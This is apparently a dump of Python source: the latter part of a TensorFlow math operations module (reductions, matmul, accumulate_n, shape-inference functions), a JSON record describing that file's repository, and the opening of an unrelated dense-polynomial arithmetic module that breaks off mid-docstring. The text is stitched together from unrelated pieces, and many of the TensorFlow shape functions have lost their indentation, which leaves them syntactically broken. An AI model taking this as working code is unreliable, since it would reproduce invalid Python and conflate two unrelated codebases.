  """x ^ y = (x | y) & ~(x & y)."""
  # TODO(alemi) Make this a cwise op if people end up relying on it.
  either = logical_or(x, y)
  not_both = logical_not(logical_and(x, y))
  return logical_and(either, not_both, name=name)
# Register the boolean operators (&, |, ^) and the ordering comparisons on
# Tensor. NOTE(review): __eq__/__ne__ are not overridden in this block.
_OverrideBinaryOperatorHelper(logical_and, "and")
_OverrideBinaryOperatorHelper(logical_or, "or")
_OverrideBinaryOperatorHelper(logical_xor, "xor")
ops.Tensor._override_operator("__lt__", less)
ops.Tensor._override_operator("__le__", less_equal)
ops.Tensor._override_operator("__gt__", greater)
ops.Tensor._override_operator("__ge__", greater_equal)
def range(start, limit, delta=1, name="range"):
  """Creates a sequence of integers.

  This operation creates a sequence of integers that begins at `start` and
  extends by increments of `delta` up to but not including `limit`.

  For example:

  ```
  # 'start' is 3
  # 'limit' is 18
  # 'delta' is 3
  tf.range(start, limit, delta) ==> [3, 6, 9, 12, 15]
  ```

  Args:
    start: A 0-D (scalar) of type `int32`. First entry in sequence.
    limit: A 0-D (scalar) of type `int32`. Upper limit of sequence,
      exclusive.
    delta: A 0-D `Tensor` (scalar) of type `int32`. Optional. Default is 1.
      Number that increments `start`.
    name: A name for the operation (optional).

  Returns:
    An 1-D `int32` `Tensor`.
  """
  # NOTE: this shadows the Python builtin 'range' within this module; helpers
  # below (e.g. _ReductionDims, _as_indexed_slices) rely on getting this op.
  return gen_math_ops._range(start, limit, delta, name=name)
@ops.RegisterShape("Range")
def _RangeShape(op):
start_value = tensor_util.ConstantValue(op.inputs[0])
limit_value = tensor_util.ConstantValue(op.inputs[1])
delta_value = tensor_util.ConstantValue(op.inputs[2])
if start_value is None or limit_value is None or delta_value is None:
return [tensor_shape.vector(None)]
else:
return [tensor_shape.vector(
(limit_value - start_value + delta_value - 1) / delta_value)]
# Reduction operations
def _ReductionDims(x, reduction_indices):
  """Returns the dimensions to reduce: the given indices, or all of them.

  When `reduction_indices` is None this falls back to `range(0, rank(x))`;
  note that `range` here is the tf range op defined above, not the builtin.
  """
  if reduction_indices is None:
    return range(0, array_ops.rank(x))
  return reduction_indices
def reduce_sum(input_tensor, reduction_indices=None, keep_dims=False,
               name=None):
  """Computes the sum of elements across dimensions of a tensor.

  Reduces `input_tensor` along the dimensions given in `reduction_indices`.
  Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
  entry in `reduction_indices`; otherwise the reduced dimensions are retained
  with length 1. If `reduction_indices` has no entries, all dimensions are
  reduced and a tensor with a single element is returned.

  For example:

  ```python
  # 'x' is [[1, 1, 1]]
  #         [1, 1, 1]]
  tf.reduce_sum(x) ==> 6
  tf.reduce_sum(x, 0) ==> [2, 2, 2]
  tf.reduce_sum(x, 1) ==> [3, 3]
  tf.reduce_sum(x, 1, keep_dims=True) ==> [[3], [3]]
  tf.reduce_sum(x, [0, 1]) ==> 6
  ```

  Args:
    input_tensor: The tensor to reduce. Should have numeric type.
    reduction_indices: The dimensions to reduce. If `None` (the default),
      reduces all dimensions.
    keep_dims: If true, retains reduced dimensions with length 1.
    name: A name for the operation (optional).

  Returns:
    The reduced tensor.
  """
  dims = _ReductionDims(input_tensor, reduction_indices)
  return gen_math_ops._sum(input_tensor, dims, keep_dims, name=name)
def reduce_mean(input_tensor, reduction_indices=None, keep_dims=False,
                name=None):
  """Computes the mean of elements across dimensions of a tensor.

  Reduces `input_tensor` along the dimensions given in `reduction_indices`.
  Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
  entry in `reduction_indices`; otherwise the reduced dimensions are retained
  with length 1. If `reduction_indices` has no entries, all dimensions are
  reduced and a tensor with a single element is returned.

  For example:

  ```python
  # 'x' is [[1., 1. ]]
  #         [2., 2.]]
  tf.reduce_mean(x) ==> 1.5
  tf.reduce_mean(x, 0) ==> [1.5, 1.5]
  tf.reduce_mean(x, 1) ==> [1., 2.]
  ```

  Args:
    input_tensor: The tensor to reduce. Should have numeric type.
    reduction_indices: The dimensions to reduce. If `None` (the default),
      reduces all dimensions.
    keep_dims: If true, retains reduced dimensions with length 1.
    name: A name for the operation (optional).

  Returns:
    The reduced tensor.
  """
  dims = _ReductionDims(input_tensor, reduction_indices)
  return gen_math_ops._mean(input_tensor, dims, keep_dims, name=name)
def reduce_prod(input_tensor, reduction_indices=None, keep_dims=False,
                name=None):
  """Computes the product of elements across dimensions of a tensor.

  Reduces `input_tensor` along the dimensions given in `reduction_indices`.
  Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
  entry in `reduction_indices`; otherwise the reduced dimensions are retained
  with length 1. If `reduction_indices` has no entries, all dimensions are
  reduced and a tensor with a single element is returned.

  Args:
    input_tensor: The tensor to reduce. Should have numeric type.
    reduction_indices: The dimensions to reduce. If `None` (the default),
      reduces all dimensions.
    keep_dims: If true, retains reduced dimensions with length 1.
    name: A name for the operation (optional).

  Returns:
    The reduced tensor.
  """
  dims = _ReductionDims(input_tensor, reduction_indices)
  return gen_math_ops._prod(input_tensor, dims, keep_dims, name=name)
def reduce_min(input_tensor, reduction_indices=None, keep_dims=False,
               name=None):
  """Computes the minimum of elements across dimensions of a tensor.

  Reduces `input_tensor` along the dimensions given in `reduction_indices`.
  Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
  entry in `reduction_indices`; otherwise the reduced dimensions are retained
  with length 1. If `reduction_indices` has no entries, all dimensions are
  reduced and a tensor with a single element is returned.

  Args:
    input_tensor: The tensor to reduce. Should have numeric type.
    reduction_indices: The dimensions to reduce. If `None` (the default),
      reduces all dimensions.
    keep_dims: If true, retains reduced dimensions with length 1.
    name: A name for the operation (optional).

  Returns:
    The reduced tensor.
  """
  dims = _ReductionDims(input_tensor, reduction_indices)
  return gen_math_ops._min(input_tensor, dims, keep_dims, name=name)
def reduce_max(input_tensor, reduction_indices=None, keep_dims=False,
               name=None):
  """Computes the maximum of elements across dimensions of a tensor.

  Reduces `input_tensor` along the dimensions given in `reduction_indices`.
  Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
  entry in `reduction_indices`; otherwise the reduced dimensions are retained
  with length 1. If `reduction_indices` has no entries, all dimensions are
  reduced and a tensor with a single element is returned.

  Args:
    input_tensor: The tensor to reduce. Should have numeric type.
    reduction_indices: The dimensions to reduce. If `None` (the default),
      reduces all dimensions.
    keep_dims: If true, retains reduced dimensions with length 1.
    name: A name for the operation (optional).

  Returns:
    The reduced tensor.
  """
  dims = _ReductionDims(input_tensor, reduction_indices)
  return gen_math_ops._max(input_tensor, dims, keep_dims, name=name)
def reduce_all(input_tensor, reduction_indices=None, keep_dims=False,
               name=None):
  """Computes the "logical and" of elements across dimensions of a tensor.

  Reduces `input_tensor` along the dimensions given in `reduction_indices`.
  Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
  entry in `reduction_indices`; otherwise the reduced dimensions are retained
  with length 1. If `reduction_indices` has no entries, all dimensions are
  reduced and a tensor with a single element is returned.

  For example:

  ```python
  # 'x' is [[True, True]]
  #         [False, False]]
  tf.reduce_all(x) ==> False
  tf.reduce_all(x, 0) ==> [False, False]
  tf.reduce_all(x, 1) ==> [True, False]
  ```

  Args:
    input_tensor: The boolean tensor to reduce.
    reduction_indices: The dimensions to reduce. If `None` (the default),
      reduces all dimensions.
    keep_dims: If true, retains reduced dimensions with length 1.
    name: A name for the operation (optional).

  Returns:
    The reduced tensor.
  """
  dims = _ReductionDims(input_tensor, reduction_indices)
  return gen_math_ops._all(input_tensor, dims, keep_dims, name=name)
def reduce_any(input_tensor, reduction_indices=None, keep_dims=False,
               name=None):
  """Computes the "logical or" of elements across dimensions of a tensor.

  Reduces `input_tensor` along the dimensions given in `reduction_indices`.
  Unless `keep_dims` is true, the rank of the tensor is reduced by 1 for each
  entry in `reduction_indices`; otherwise the reduced dimensions are retained
  with length 1. If `reduction_indices` has no entries, all dimensions are
  reduced and a tensor with a single element is returned.

  For example:

  ```python
  # 'x' is [[True, True]]
  #         [False, False]]
  tf.reduce_any(x) ==> True
  tf.reduce_any(x, 0) ==> [True, True]
  tf.reduce_any(x, 1) ==> [True, False]
  ```

  Args:
    input_tensor: The boolean tensor to reduce.
    reduction_indices: The dimensions to reduce. If `None` (the default),
      reduces all dimensions.
    keep_dims: If true, retains reduced dimensions with length 1.
    name: A name for the operation (optional).

  Returns:
    The reduced tensor.
  """
  dims = _ReductionDims(input_tensor, reduction_indices)
  return gen_math_ops._any(input_tensor, dims, keep_dims, name=name)
def matmul(a, b,
           transpose_a=False, transpose_b=False,
           a_is_sparse=False, b_is_sparse=False,
           name=None):
  """Multiplies matrix `a` by matrix `b`, producing `a` * `b`.

  The inputs must be two-dimensional matrices, with matching inner
  dimensions, possibly after transposition. Both matrices must be of the
  same type; the supported types are `float`, `double`, `int32`,
  `complex64`.

  Either matrix can be transposed on the fly by setting the corresponding
  flag to `True` (both default to `False`). If one or both of the matrices
  contain a lot of zeros, set `a_is_sparse` / `b_is_sparse` to use a more
  efficient multiplication algorithm (both default to `False`).

  For example:

  ```python
  # 2-D tensor `a`
  a = tf.constant([1, 2, 3, 4, 5, 6], shape=[2, 3]) => [[1. 2. 3.]
                                                        [4. 5. 6.]]
  # 2-D tensor `b`
  b = tf.constant([7, 8, 9, 10, 11, 12], shape=[3, 2]) => [[7. 8.]
                                                           [9. 10.]
                                                           [11. 12.]]
  c = tf.matmul(a, b) => [[58 64]
                          [139 154]]
  ```

  Args:
    a: `Tensor` of type `float`, `double`, `int32` or `complex64`.
    b: `Tensor` with same type as `a`.
    transpose_a: If `True`, `a` is transposed before multiplication.
    transpose_b: If `True`, `b` is transposed before multiplication.
    a_is_sparse: If `True`, `a` is treated as a sparse matrix.
    b_is_sparse: If `True`, `b` is treated as a sparse matrix.
    name: Name for the operation (optional).

  Returns:
    A `Tensor` of the same type as `a`.
  """
  with ops.op_scope([a, b], name, "MatMul") as name:
    a = ops.convert_to_tensor(a, name="a")
    b = ops.convert_to_tensor(b, name="b")
    # The sparse kernel is only available for float32 operands.
    use_sparse_kernel = (a_is_sparse or b_is_sparse) and a.dtype == types.float32
    if use_sparse_kernel:
      return sparse_matmul(a, b,
                           transpose_a=transpose_a,
                           transpose_b=transpose_b,
                           a_is_sparse=a_is_sparse,
                           b_is_sparse=b_is_sparse,
                           name=name)
    return gen_math_ops._mat_mul(a, b,
                                 transpose_a=transpose_a,
                                 transpose_b=transpose_b,
                                 name=name)
# Public aliases for the generated sparse/batch matmul kernels; MatMul and
# SparseMatMul share the common matmul shape function.
sparse_matmul = gen_math_ops._sparse_mat_mul
batch_matmul = gen_math_ops._batch_mat_mul
ops.RegisterShape("MatMul")(common_shapes.matmul_shape)
ops.RegisterShape("SparseMatMul")(common_shapes.matmul_shape)
def _as_indexed_slices(x):
  """Convert 'x' to IndexedSlices.

  Convert a dense Tensor to a block-sparse IndexedSlices.

  Args:
    x: Either a Tensor object, or an IndexedSlices object.

  Returns:
    An IndexedSlices object.

  Raises:
    TypeError: If 'x' is not a Tensor or an IndexedSlices object.
  """
  # TODO(touts): op_scope
  if not isinstance(x, (ops.Tensor, ops.IndexedSlices)):
    raise TypeError("Not a Tensor or IndexedSlices: %s" % type(x))
  if isinstance(x, ops.IndexedSlices):
    return x
  x_shape = array_ops.shape(x)
  # NOTE: 'range' here is this module's tf range op (defined above), not the
  # Python builtin — every row index [0, dim0) is listed explicitly.
  return ops.IndexedSlices(x, range(0, x_shape[0]), x_shape)
def _as_indexed_slices_list(inputs):
  """Convert all elements of 'inputs' to IndexedSlices.

  Additionally, homogenize the types of all the indices to
  either int32 or int64.

  Args:
    inputs: List containing either Tensor or IndexedSlices objects.

  Returns:
    A list of IndexedSlices objects.

  Raises:
    TypeError: If 'inputs' is not a list or a tuple.
  """
  if not isinstance(inputs, (list, tuple)):
    raise TypeError("Expected a list or tuple, not a %s" % type(inputs))
  outputs = [_as_indexed_slices(i) for i in inputs]
  with_int32_index = [o.indices for o in outputs
                      if o.indices.dtype == types.int32]
  # Nothing to do when the index dtypes are already homogeneous.
  if not with_int32_index or len(with_int32_index) == len(outputs):
    return outputs
  # Mixed index dtypes: widen every int32 index tensor to int64.
  return [o if o.indices.dtype != types.int32
          else ops.IndexedSlices(o.values, cast(o.indices, types.int64),
                                 o.dense_shape)
          for o in outputs]
def accumulate_n(inputs, shape=None, tensor_dtype=None, name=None):
  """Returns the element-wise sum of a list of tensors.

  Optionally, pass `shape` and `tensor_dtype` for shape and type checking,
  otherwise, these are inferred.

  For example:

  ```python
  # tensor 'a' is [[1, 2], [3, 4]
  # tensor `b` is [[5, 0], [0, 6]]
  tf.accumulate_n([a, b, a]) ==> [[7, 4], [6, 14]]

  # Explicitly pass shape and type
  tf.accumulate_n([a, b, a], shape=[2, 2], tensor_dtype=tf.int32)
    ==> [[7, 4], [6, 14]]
  ```

  Args:
    inputs: A list of `Tensor` objects, each with same shape and type.
    shape: Shape of elements of `inputs`.
    tensor_dtype: The type of `inputs`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of same shape and type as the elements of `inputs`.

  Raises:
    ValueError: If `inputs` don't all have same shape and dtype or the shape
    cannot be inferred.
  """
  # NOTE(review): list/dtype validation only runs when tensor_dtype has to be
  # inferred; an explicit tensor_dtype skips these checks entirely.
  if tensor_dtype is None:
    if not inputs or not isinstance(inputs, (list, tuple)):
      raise ValueError("inputs must be a list of at least one Tensor with the "
                       "same dtype and shape")
    inputs = ops.convert_n_to_tensor_or_indexed_slices(inputs)
    if not all(isinstance(x, ops.Tensor) for x in inputs):
      raise ValueError("inputs must be a list of at least one Tensor with the "
                       "same dtype and shape")
    if not all(x.dtype == inputs[0].dtype for x in inputs):
      raise ValueError("inputs must be a list of at least one Tensor with the "
                       "same dtype and shape")
    tensor_dtype = inputs[0].dtype
  # Determine the accumulator's shape: either the caller-supplied one or the
  # merge of every statically-known input shape.
  if shape is not None:
    shape = tensor_shape.as_shape(shape)
  else:
    shape = tensor_shape.unknown_shape()
    for input_tensor in inputs:
      if isinstance(input_tensor, ops.Tensor):
        shape = shape.merge_with(input_tensor.get_shape())
  if not shape.is_fully_defined():
    # TODO(pbar): Make a version of assign_add that accepts an uninitialized
    # lvalue, and takes its shape from that? This would allow accumulate_n to
    # work in all situations that add_n currently works.
    raise ValueError("Cannot infer the shape of the accumulator for "
                     "accumulate_n. Pass the shape argument, or set the shape "
                     "of at least one of the inputs.")
  with ops.op_scope(inputs, name, "AccumulateN") as name:
    # Accumulate into a zero-initialized temporary variable using locked
    # assign_add ops, then destroy the temporary and return its final value.
    var = gen_state_ops._temporary_variable(shape=shape, dtype=tensor_dtype)
    var_name = var.op.name
    var = state_ops.assign(var, array_ops.zeros_like(inputs[0]))
    update_ops = []
    for input_tensor in inputs:
      op = state_ops.assign_add(var, input_tensor, use_locking=True)
      update_ops.append(op)
    # The destroy op must run after every partial sum has been applied.
    with ops.control_dependencies(update_ops):
      return gen_state_ops._destroy_temporary_variable(var,
                                                       var_name=var_name,
                                                       name=name)
@ops.RegisterShape("BatchMatMul")
def _BatchMatMulShape(op):
"""Shape function for BatchMatMul op."""
a_shape = op.inputs[0].get_shape()
adj_a = op.get_attr("adj_x")
b_shape = op.inputs[1].get_shape()
adj_b = op.get_attr("adj_y")
if not a_shape.is_fully_defined() or not b_shape.is_fully_defined():
return [tensor_shape.unknown_shape()]
batch_dims = a_shape[:-2].merge_with(b_shape[:-2])
output_rows = a_shape[-1] if adj_a else a_shape[-2]
output_cols = b_shape[-2] if adj_b else b_shape[-1]
inner_a = a_shape[-2] if adj_a else a_shape[-1]
inner_b = b_shape[-1] if adj_b else b_shape[-2]
inner_a.assert_is_compatible_with(inner_b)
return [batch_dims.concatenate([output_rows, output_cols])]
def sigmoid(x, name=None):
  """Computes sigmoid of `x` element-wise.

  Specifically, `y = 1 / (1 + exp(-x))`.

  Args:
    x: A Tensor with type `float`, `double`, `int32`, `complex64`, `int64`,
      or `qint32`.
    name: A name for the operation (optional).

  Returns:
    A Tensor with the same type as `x` if `x.dtype != qint32`
    otherwise the return type is `quint8`.
  """
  with ops.op_scope([x], name, "Sigmoid") as name:
    tensor = ops.convert_to_tensor(x, name="x")
    return gen_math_ops._sigmoid(tensor, name=name)
def tanh(x, name=None):
  """Computes hyperbolic tangent of `x` element-wise.

  Args:
    x: A Tensor with type `float`, `double`, `int32`, `complex64`, `int64`,
      or `qint32`.
    name: A name for the operation (optional).

  Returns:
    A Tensor with the same type as `x` if `x.dtype != qint32` otherwise
    the return type is `quint8`.
  """
  with ops.op_scope([x], name, "Tanh") as name:
    tensor = ops.convert_to_tensor(x, name="x")
    return gen_math_ops._tanh(tensor, name=name)
ops.RegisterShape("Abs")(common_shapes.unchanged_shape)
ops.RegisterShape("Ceil")(common_shapes.unchanged_shape)
ops.RegisterShape("Conj")(common_shapes.unchanged_shape)
ops.RegisterShape("Cos")(common_shapes.unchanged_shape)
ops.RegisterShape("Exp")(common_shapes.unchanged_shape)
ops.RegisterShape("Floor")(common_shapes.unchanged_shape)
ops.RegisterShape("Imag")(common_shapes.unchanged_shape)
ops.RegisterShape("Inv")(common_shapes.unchanged_shape)
ops.RegisterShape("IsFinite")(common_shapes.unchanged_shape)
ops.RegisterShape("IsInf")(common_shapes.unchanged_shape)
ops.RegisterShape("IsNan")(common_shapes.unchanged_shape)
ops.RegisterShape("Log")(common_shapes.unchanged_shape)
ops.RegisterShape("LogicalNot")(common_shapes.unchanged_shape)
ops.RegisterShape("Neg")(common_shapes.unchanged_shape)
ops.RegisterShape("Real")(common_shapes.unchanged_shape)
ops.RegisterShape("Rsqrt")(common_shapes.unchanged_shape)
ops.RegisterShape("Sign")(common_shapes.unchanged_shape)
ops.RegisterShape("Sin")(common_shapes.unchanged_shape)
ops.RegisterShape("Sqrt")(common_shapes.unchanged_shape)
ops.RegisterShape("Square")(common_shapes.unchanged_shape)
ops.RegisterShape("Sigmoid")(common_shapes.unchanged_shape)
ops.RegisterShape("Tanh")(common_shapes.unchanged_shape)
ops.RegisterShape("Cast")(common_shapes.unchanged_shape)
ops.RegisterShape("ComplexAbs")(common_shapes.unchanged_shape)
@ops.RegisterShape("Add")
@ops.RegisterShape("Complex")
@ops.RegisterShape("Div")
@ops.RegisterShape("Equal")
@ops.RegisterShape("Greater")
@ops.RegisterShape("GreaterEqual")
@ops.RegisterShape("Less")
@ops.RegisterShape("LessEqual")
@ops.RegisterShape("LogicalAnd")
@ops.RegisterShape("LogicalOr")
@ops.RegisterShape("Maximum")
@ops.RegisterShape("Minimum")
@ops.RegisterShape("Mod")
@ops.RegisterShape("Mul")
@ops.RegisterShape("NotEqual")
@ops.RegisterShape("Pow")
@ops.RegisterShape("Sub")
def _BroadcastShape(op):
"""Common shape function for binary operators that broadcast their inputs."""
shape_x = op.inputs[0].get_shape()
shape_y = op.inputs[1].get_shape()
if shape_x.ndims is None or shape_y.ndims is None:
return [tensor_shape.unknown_shape()]
# To compute the broadcasted dimensions, we zip together shape_x and shape_y,
# and pad with 1 to make them the same length.
broadcasted_dims = reversed(list(itertools.izip_longest(
reversed(shape_x.dims), reversed(shape_y.dims),
fillvalue=tensor_shape.Dimension(1))))
# Next we combine the dimensions according to the numpy broadcasting rules.
# http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html
return_dims = []
for (dim_x, dim_y) in broadcasted_dims:
if dim_x.value is None or dim_y.value is None:
# One or both dimensions is unknown. If either dimension is greater than
# 1, we assume that the program is correct, and the other dimension will
# be broadcast to match it.
# TODO(mrry): If we eliminate the shape checks in C++, we must still
# assert that the unknown dim is either 1 or the same as the known dim.
if dim_x.value is not None and dim_x.value > 1:
return_dims.append(dim_x)
elif dim_y.value is not None and dim_y.value > 1:
return_dims.append(dim_y)
else:
return_dims.append(None)
elif dim_x.value == 1:
# We will broadcast dim_x to dim_y.
return_dims.append(dim_y)
elif dim_y.value == 1:
# We will broadcast dim_y to dim_x.
return_dims.append(dim_x)
elif dim_x.value == dim_y.value:
# The dimensions are compatible, so output is the same size in that
# dimension.
return_dims.append(dim_x.merge_with(dim_y))
else:
raise ValueError("Incompatible shapes for broadcasting: %s and %s"
% (shape_x, shape_y))
return [tensor_shape.TensorShape(return_dims)]
@ops.RegisterShape("AddN")
def _AddNShape(op):
merged_shape = tensor_shape.unknown_shape()
for input_ in op.inputs:
merged_shape = merged_shape.merge_with(input_.get_shape())
return [merged_shape]
@ops.RegisterShape("Select")
def _SelectShape(op):
# All three inputs must have the same shape.
return [op.inputs[0].get_shape()
.merge_with(op.inputs[1].get_shape())
.merge_with(op.inputs[2].get_shape())]
@ops.RegisterShape("ArgMax")
@ops.RegisterShape("ArgMin")
def _ArgOpShape(op):
"""Common shape function for arg-reduction ops."""
dimension_shape = op.inputs[1].get_shape()
dimension_shape.assert_is_compatible_with(tensor_shape.scalar())
input_shape = op.inputs[0].get_shape()
if input_shape.ndims is None:
return [tensor_shape.unknown_shape()]
elif input_shape.ndims <= 1:
return [tensor_shape.scalar()]
dimension = tensor_util.ConstantValue(op.inputs[1])
if dimension is None:
return [tensor_shape.unknown_shape(ndims=input_shape.ndims - 1)]
elif 0 <= dimension and dimension < input_shape.ndims:
returned_shape = []
for i, dim in enumerate(input_shape.dims):
if i != dimension:
returned_shape.append(dim)
return [tensor_shape.TensorShape(returned_shape)]
else:
raise ValueError(
"dimension (%d) must be in the range [0, %d), where %d is the number "
"of dimensions in the input"
% (dimension, input_shape.ndims, input_shape.ndims))
@ops.RegisterShape("All")
@ops.RegisterShape("Any")
@ops.RegisterShape("Max")
@ops.RegisterShape("Mean")
@ops.RegisterShape("Min")
@ops.RegisterShape("Prod")
@ops.RegisterShape("Sum")
def _ReductionShape(op):
"""Common shape function for reduction ops."""
input_shape = op.inputs[0].get_shape()
reduction_indices = tensor_util.ConstantValue(op.inputs[1])
keep_dims = op.get_attr("keep_dims")
if reduction_indices is None or input_shape.ndims is None:
if keep_dims:
return [tensor_shape.unknown_shape(ndims=input_shape.ndims)]
else:
return [tensor_shape.unknown_shape()]
# Turn reduction_indices from scalar to vector if necessary
reduction_indices = np.ravel(reduction_indices)
for reduction_index in reduction_indices:
if reduction_index < 0 or reduction_index >= input_shape.ndims:
raise ValueError("Invalid reduction dimension %d for input with %d "
"dimensions" % (reduction_index, input_shape.ndims))
returned_dims = []
if keep_dims:
for i, dim in enumerate(input_shape.dims):
if i in reduction_indices:
returned_dims.append(1)
else:
returned_dims.append(dim)
else:
for i, dim in enumerate(input_shape.dims):
if i not in reduction_indices:
returned_dims.append(dim)
return [tensor_shape.TensorShape(returned_dims)]
@ops.RegisterShape("SegmentMax")
@ops.RegisterShape("SegmentMean")
@ops.RegisterShape("SegmentMin")
@ops.RegisterShape("SegmentProd")
@ops.RegisterShape("SegmentSum")
def _SegmentReductionShape(op):
"""Common shape function for segment reduction ops."""
data_shape = op.inputs[0].get_shape()
segment_ids_shape = op.inputs[1].get_shape()
segment_ids_shape.assert_has_rank(1)
return [tensor_shape.TensorShape([None]).concatenate(data_shape[1:])]
@ops.RegisterShape("SparseSegmentMean")
@ops.RegisterShape("SparseSegmentSum")
def _SparseSegmentReductionShape(op):
"""Common shape function for sparse segment reduction ops."""
data_shape = op.inputs[0].get_shape()
indices_shape = op.inputs[1].get_shape()
indices_shape.assert_has_rank(1)
segment_ids_shape = op.inputs[2].get_shape()
segment_ids_shape.assert_has_rank(1)
indices_shape.assert_is_compatible_with(segment_ids_shape)
return [tensor_shape.TensorShape([None]).concatenate(data_shape[1:])]
@ops.RegisterShape("SparseSegmentMeanGrad")
def _SparseSegmentMeanGradShape(op):
"""Shape function for the SparseSegmentMeanGrad op."""
input_shape = op.inputs[0].get_shape()
indices_shape = op.inputs[1].get_shape().with_rank(1)
unused_segment_ids_shape = op.inputs[2].get_shape().merge_with(indices_shape)
unused_output_dim0_shape = op.inputs[3].get_shape().merge_with(
tensor_shape.scalar())
output_dim0 = tensor_util.ConstantValue(op.inputs[3])
if output_dim0 is not None:
dim0 = output_dim0[0]
else:
dim0 = None
return [tensor_shape.TensorShape([dim0]).concatenate(input_shape[1:])]
@ops.RegisterShape("UnsortedSegmentSum")
def _UnsortedSegmentSumShape(op):
"""Shape function for UnsortedSegmentSum."""
data_shape = op.inputs[0].get_shape()
segment_ids_shape = op.inputs[1].get_shape()
mid = segment_ids_shape.ndims
if mid is None:
return [tensor_shape.unknown_shape()]
else:
num_segments = tensor_util.ConstantValue(op.inputs[2])
return [tensor_shape.TensorShape([num_segments]).concatenate(
data_shape[mid:])]
@ops.RegisterShape("LinSpace")
def _LinspaceShape(op):
num = tensor_util.ConstantValue(op.inputs[2])
return [tensor_shape.vector(num)]
| {
"repo_name": "liyu1990/tensorflow",
"path": "tensorflow/python/ops/math_ops.py",
"copies": "5",
"size": "38848",
"license": "apache-2.0",
"hash": -902587780172944600,
"line_mean": 31.3463780183,
"line_max": 86,
"alpha_frac": 0.6608319605,
"autogenerated": false,
"ratio": 3.496040316774658,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6656872277274658,
"avg_score": null,
"num_lines": null
} |
"""Arithmetics for dense recursive polynomials in ``K[x]`` or ``K[X]``."""
from .densebasic import (dmp_degree_in, dmp_one, dmp_one_p, dmp_slice_in,
dmp_strip, dmp_zero, dmp_zero_p, dmp_zeros)
from .polyconfig import query
def dup_add_term(f, c, i, K):
    """
    Add ``c*x**i`` to ``f`` in ``K[x]``.

    Examples
    ========

    >>> R, x = ring('x', ZZ)

    >>> R.dmp_add_term(x**2 - 1, ZZ(2), 4)
    2*x**4 + x**2 - 1
    """
    if not c:
        return f

    n = len(f)

    if i >= n:
        # New leading term: pad with zeros between x**i and the old leader.
        return [c] + [K.zero]*(i - n) + f

    m = n - i - 1
    updated = f[:m] + [f[m] + c] + f[m + 1:]

    # Adding into the leading coefficient may cancel it, so re-normalize.
    return dmp_strip(updated, 0) if m == 0 else updated
def dmp_add_term(f, c, i, u, K):
    """
    Add ``c(x_2..x_u)*x_0**i`` to ``f`` in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)

    >>> R.dmp_add_term(x*y + 1, 2, 2)
    2*x**2 + x*y + 1
    """
    if not u:
        return dup_add_term(f, c, i, K)

    v = u - 1

    if dmp_zero_p(c, v):
        return f

    n = len(f)

    if i >= n:
        # New leading term: pad with zero polynomials up to x_0**i.
        return [c] + dmp_zeros(i - n, v, K) + f

    m = n - i - 1
    updated = f[:m] + [dmp_add(f[m], c, v, K)] + f[m + 1:]

    # Adding into the leading coefficient may cancel it, so re-normalize.
    return dmp_strip(updated, u) if m == 0 else updated
def dup_mul_term(f, c, i, K):
    """
    Multiply ``f`` by ``c*x**i`` in ``K[x]``.

    Examples
    ========

    >>> R, x = ring('x', ZZ)

    >>> R.dmp_mul_term(x**2 - 1, ZZ(3), 2)
    3*x**4 - 3*x**2
    """
    if not f or not c:
        return []
    # Scale every coefficient, then shift by x**i by appending i zeros.
    return [cf * c for cf in f] + [K.zero]*i
def dmp_mul_term(f, c, i, u, K):
    """
    Multiply ``f`` by ``c(x_2..x_u)*x_0**i`` in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)

    >>> R.dmp_mul_term(x**2*y + x, 3*y, 2)
    3*x**4*y**2 + 3*x**3*y
    """
    if not u:
        return dup_mul_term(f, c, i, K)

    if dmp_zero_p(f, u):
        return f

    v = u - 1
    if dmp_zero_p(c, v):
        return dmp_zero(u)

    # Scale every coefficient, then shift by x_0**i with zero polynomials.
    return [dmp_mul(cf, c, v, K) for cf in f] + dmp_zeros(i, v, K)
def dmp_mul_ground(f, c, u, K):
    """
    Multiply ``f`` by a constant value in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)

    >>> R.dmp_mul_ground(2*x + 2*y, ZZ(3))
    6*x + 6*y
    """
    if u:
        v = u - 1
        return [dmp_mul_ground(cf, c, v, K) for cf in f]
    # Univariate base case: c may be zero, so strip the result.
    return dmp_strip([cf * c for cf in f], u)
def dmp_quo_ground(f, c, u, K):
    """
    Quotient by a constant in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)

    >>> R.dmp_quo_ground(2*x**2*y + 3*x, ZZ(2))
    x**2*y + x

    >>> R, x, y = ring('x y', QQ)

    >>> R.dmp_quo_ground(2*x**2*y + 3*x, QQ(2))
    x**2*y + 3/2*x
    """
    if u:
        v = u - 1
        return [dmp_quo_ground(cf, c, v, K) for cf in f]

    if not c:
        raise ZeroDivisionError('polynomial division')
    if not f:
        return f

    # Fields use exact division; rings fall back to floor division.
    if K.is_Field:
        return [K.quo(cf, c) for cf in f]
    return [cf // c for cf in f]
def dmp_exquo_ground(f, c, u, K):
    """
    Exact quotient by a constant in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', QQ)

    >>> R.dmp_exquo_ground(x**2*y + 2*x, QQ(2))
    1/2*x**2*y + x
    """
    if u:
        v = u - 1
        return [dmp_exquo_ground(cf, c, v, K) for cf in f]

    if not c:
        raise ZeroDivisionError('polynomial division')
    if not f:
        return f

    return [K.exquo(cf, c) for cf in f]
def dup_lshift(f, n, K):
    """
    Efficiently multiply ``f`` by ``x**n`` in ``K[x]``.

    Examples
    ========

    >>> R, x = ring('x', ZZ)

    >>> R.dup_lshift(x**2 + 1, 2)
    x**4 + x**2
    """
    # Appending n zero coefficients shifts every term up by x**n; the zero
    # polynomial is returned unchanged.
    return f + [K.zero]*n if f else f
def dup_rshift(f, n, K):
    """
    Efficiently divide ``f`` by ``x**n`` in ``K[x]``.

    Low-order coefficients below ``x**n`` are discarded, i.e. this is the
    exact inverse of :func:`dup_lshift` only when those coefficients vanish.

    Examples
    ========

    >>> R, x = ring('x', ZZ)

    >>> R.dup_rshift(x**4 + x**2, 2)
